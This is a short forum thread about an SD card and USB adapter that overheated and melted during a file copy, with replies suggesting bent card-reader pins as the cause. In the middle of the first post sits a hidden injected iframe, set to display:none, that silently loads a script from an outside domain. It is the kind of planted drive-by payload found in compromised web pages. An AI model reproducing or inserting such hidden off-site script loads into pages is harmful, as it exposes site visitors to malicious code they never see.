+ Reply to Thread

SD Card Burnt Slap Up!

Has anyone ever had a SD card fry? Mine did last night...its a 256 SD Card using a generic USB 1.1 connector something like the Cuzer. I was moving the lastest Fleetwood Mac CD's mp3s to the card which was taking like 11 minutes so I stepped away for a cup of tea, came back it was had stopped responded, I reach down to pull it out of the USB plug and cound not hot the device because it was so hot, pulled the SD card out and it had got so hot that the plastic was deformed. Of couse the card and adaptor are a write off, has this ever happened to anyone else?

I have bene having USB problems with my computer so that is what I'm considering to be the possible cause.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

--terry
    --------------------------------------
    Enjoy the journey, it should be just as much fun as the destination.

you should check and see if any of the pins in your USB card reader got bent....I had a bad reader which that happened to.
    "Why all the pearls, why the blue hair, why anything!?"

Thanks Azzy, I will do!

--terry

Just FYI, the SD card reader pins are small thin metal pieces...they will bend extremely easily, so don't ever force a card in there. The reader I had was F-ed up from the factory. (I returned 2 SD cards thinking it was a bad Sandisk card...then I thought to look at the reader).
    "Why all the pearls, why the blue hair, why anything!?"

Rodge!

--terry